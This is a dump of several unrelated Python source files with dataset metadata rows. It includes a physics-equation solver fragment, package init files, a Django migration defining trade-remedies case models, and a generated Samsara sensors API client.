# elif (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
# if type(self.v_squared_equals_u_squared_plus_2as()) is complex:
# raise TypeError("Result is a complex number")
# else:
# return round(self.v_squared_equals_u_squared_plus_2as(),2)
# else:
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 'a') and (self.A is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
# elif (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) :
# return round(self.v_squared_equals_u_squared_plus_2as(),2)
# else:
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# else:
# return "ERROR: YOU DID NOT SELECT A VALID VARIABLE TO FIND"
def print_values(self) :
values = f'''
S is {self.S}
U is {self.U}
V is {self.V}
A is {self.A}
T is {self.T}
'''
print(values)
| 54.185714 | 184 | 0.572634 | 2,066 | 11,379 | 3.053727 | 0.035334 | 0.235854 | 0.099857 | 0.156919 | 0.90363 | 0.889998 | 0.864796 | 0.853226 | 0.804089 | 0.7987 | 0 | 0.007929 | 0.290623 | 11,379 | 209 | 185 | 54.444976 | 0.773662 | 0.291678 | 0 | 0.406504 | 0 | 0 | 0.011612 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065041 | false | 0.04065 | 0.00813 | 0 | 0.252033 | 0.03252 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5aafec0f17384703abe5ee99cb2b4b7726678cb2 | 84 | py | Python | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:52:50.000Z | 2021-11-30T16:52:50.000Z | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | null | null | null | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | null | null | null | from . import misc # noqa
from . import curate # noqa
from . import check # noqa
| 21 | 28 | 0.678571 | 12 | 84 | 4.75 | 0.5 | 0.526316 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 84 | 3 | 29 | 28 | 0.904762 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5ac4b368a6d58d6c48e66428bf7837810e8a6d9f | 16,103 | py | Python | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | 1 | 2020-08-13T10:37:15.000Z | 2020-08-13T10:37:15.000Z | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | 4 | 2020-09-10T13:41:52.000Z | 2020-12-16T09:00:21.000Z | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | null | null | null | # Generated by Django 2.0.1 on 2018-10-15 14:44
import audit.models
import dirtyfields.dirtyfields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django_countries.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="ArchiveReason",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=250)),
("key", models.CharField(blank=True, max_length=250, null=True)),
],
),
migrations.CreateModel(
name="Case",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("sequence", models.IntegerField(blank=True, null=True, unique=True)),
("name", models.CharField(blank=True, max_length=250, null=True)),
("initiated_at", models.DateTimeField(blank=True, null=True)),
("submitted_at", models.DateTimeField(blank=True, null=True)),
("archived_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseDocument",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseDocumentType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name="CaseStage",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("key", models.CharField(max_length=100, unique=True)),
("name", models.CharField(max_length=100)),
("public_name", models.CharField(blank=True, max_length=150, null=True)),
("order", models.SmallIntegerField(default=0)),
("locking", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="CaseTimeGate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("ack", models.BooleanField(default=False)),
("ack_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
("acronym", models.CharField(blank=True, max_length=4, null=True)),
("colour", models.CharField(blank=True, max_length=16, null=True)),
],
),
migrations.CreateModel(
name="CaseWorkflow",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("workflow", django.contrib.postgres.fields.jsonb.JSONField(default=dict)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseWorkflowState",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("key", models.CharField(max_length=250)),
("value", django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
("due_date", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="DocumentTemplate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("downloaded", models.BooleanField(default=False)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="ExportSource",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("country", django_countries.fields.CountryField(max_length=2)),
],
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="HSCode",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("code", models.CharField(max_length=50, unique=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="Product",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(blank=True, max_length=250, null=True)),
("description", models.TextField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="Sector",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=250)),
("code", models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name="Submission",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(blank=True, max_length=500, null=True)),
("review", models.NullBooleanField()),
("doc_reviewed_at", models.DateTimeField(blank=True, null=True)),
("version", models.SmallIntegerField(default=1)),
("sent_at", models.DateTimeField(blank=True, null=True)),
("received_at", models.DateTimeField(blank=True, null=True)),
("due_at", models.DateTimeField(blank=True, null=True)),
("deficiency_notice", models.TextField(blank=True, null=True)),
("deficiency_sent_at", models.DateTimeField(blank=True, null=True)),
("archived", models.BooleanField(default=False)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="SubmissionDocument",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("downloads", models.SmallIntegerField(default=0)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("issued", models.BooleanField(default=False)),
("issued_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="SubmissionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=100)),
("order", models.SmallIntegerField(default=0)),
("locking", models.BooleanField(default=False)),
("version", models.BooleanField(default=False)),
("duration", models.SmallIntegerField(blank=True, null=True)),
("default", models.BooleanField(default=False)),
("sent", models.BooleanField(default=False)),
("received", models.BooleanField(default=False)),
("sufficient", models.BooleanField(default=False)),
("review", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="SubmissionType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
("key", models.CharField(blank=True, max_length=50, null=True)),
(
"direction",
models.IntegerField(
choices=[
(-1, "None"),
(0, "Both"),
(1, "Public -> TRA"),
(2, "Public <- TRA"),
],
default=0,
),
),
],
),
migrations.CreateModel(
name="TimeGate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(max_length=250)),
("spec", django.contrib.postgres.fields.jsonb.JSONField(default=dict)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
]
| 40.2575 | 97 | 0.475874 | 1,223 | 16,103 | 6.152903 | 0.111202 | 0.047841 | 0.059003 | 0.056478 | 0.8299 | 0.802658 | 0.767575 | 0.726645 | 0.702326 | 0.696478 | 0 | 0.009627 | 0.40657 | 16,103 | 399 | 98 | 40.358396 | 0.777836 | 0.002795 | 0 | 0.744898 | 1 | 0 | 0.071562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015306 | 0 | 0.02551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
518e849b7f40346a056c8e9554110a254e6733f8 | 310 | py | Python | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 10 | 2018-07-13T09:46:21.000Z | 2021-06-22T13:34:50.000Z | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 8 | 2018-09-09T11:32:40.000Z | 2019-10-08T07:47:31.000Z | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 7 | 2019-01-17T18:50:17.000Z | 2022-01-13T20:27:52.000Z | from spira.yevon.gdsii.cell import *
from spira.yevon.gdsii.cell_list import *
from spira.yevon.gdsii.group import *
from spira.yevon.gdsii.label import *
from spira.yevon.gdsii.library import *
from spira.yevon.gdsii.polygon import *
from spira.yevon.gdsii.sref import *
from spira.yevon.gdsii.pcell import *
| 34.444444 | 41 | 0.793548 | 49 | 310 | 5 | 0.265306 | 0.293878 | 0.457143 | 0.620408 | 0.82449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 310 | 8 | 42 | 38.75 | 0.881295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
cf93f4acfdc1b448c63c24dc5bad0105df15196c | 23,525 | py | Python | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | 1 | 2019-09-17T14:11:52.000Z | 2019-09-17T14:11:52.000Z | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | null | null | null | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Samsara API
# Introduction The Samsara REST API lets you interact with the Samsara Cloud from anything that can send an HTTP request. With the Samsara API you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. If you’re familiar with what you can build with a REST API, the following API reference guide will be your go-to resource. API access to the Samsara cloud is available to all Samsara administrators. If you’d like to try the API, [contact us](https://www.samsara.com/free-trial). The API is currently in beta and may be subject to frequent changes. # Connecting to the API There are two ways to connect to the API. If you prefer to use the API in Javascript or Python, we supply SDKs which you can download here: [Javascript SDK](https://github.com/samsarahq/samsara-js), [Python SDK](https://github.com/samsarahq/samsara-python). If you’d rather use another language to interact with the Samsara API, the endpoints and examples are in the reference guide below.
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SensorsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_sensors(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_sensors_with_http_info(access_token, group_param, **kwargs)
return data
def get_sensors_with_http_info(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_sensors`")
collection_formats = {}
resource_path = '/sensors/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_history(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
else:
(data) = self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
return data
def get_sensors_history_with_http_info(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history_with_http_info(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'history_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_history`")
# verify the required parameter 'history_param' is set
if ('history_param' not in params) or (params['history_param'] is None):
raise ValueError("Missing the required parameter `history_param` when calling `get_sensors_history`")
collection_formats = {}
resource_path = '/sensors/history'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'history_param' in params:
body_params = params['history_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SensorHistoryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_humidity(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_humidity_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_humidity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_humidity`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_humidity`")
collection_formats = {}
resource_path = '/sensors/humidity'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HumidityResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_temperature(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_temperature_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_temperature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_temperature`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_temperature`")
collection_formats = {}
resource_path = '/sensors/temperature'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemperatureResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
